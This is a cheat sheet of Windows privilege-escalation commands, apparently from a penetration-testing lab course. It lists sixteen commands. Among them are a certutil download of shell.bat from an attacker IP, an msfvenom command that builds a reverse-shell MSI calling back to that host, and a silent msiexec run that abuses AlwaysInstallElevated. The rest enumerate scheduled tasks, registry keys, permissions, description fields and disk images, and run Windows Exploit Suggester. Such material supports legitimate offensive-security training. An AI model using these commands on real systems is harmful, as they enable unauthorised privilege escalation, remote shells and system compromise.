Other Commands

1. Transfer file with certutil

   certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat

2. Encode file with certutil

   certutil -encode file1 encodedfile

3. Decode file with certutil

   certutil -decode encodedfile file2

4. Query for always install elevated registry key (1)

   reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

5. Query for always install elevated registry key (2)

   reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

6. Generate a malicious MSI package

   msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi

7. Executing an MSI package from command line

   msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart

8. Enumerate scheduled tasks

   schtasks /query /fo LIST /v

9. Enumerate scheduled tasks with PowerShell

   Get-ScheduledTask | select TaskName,State

10. Check permissions on a directory

    .\accesschk64.exe /accepteula -s -d C:\Scripts\

11. Check local user description field

    Get-LocalUser

12. Enumerate computer description field

    Get-WmiObject -Class Win32_OperatingSystem | select Description

13. Mount VMDK on Linux

    guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmd

14. Mount VHD/VHDX on Linux

    guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1

15. Update Windows Exploit Suggester database

    sudo python2.7 windows-exploit-suggester.py --update

16. Running Windows Exploit Suggester

    python2.7 windows-exploit-suggester.py --database 2021-05-13-mssb.xls --systeminfo win7lpe-systeminfo.txt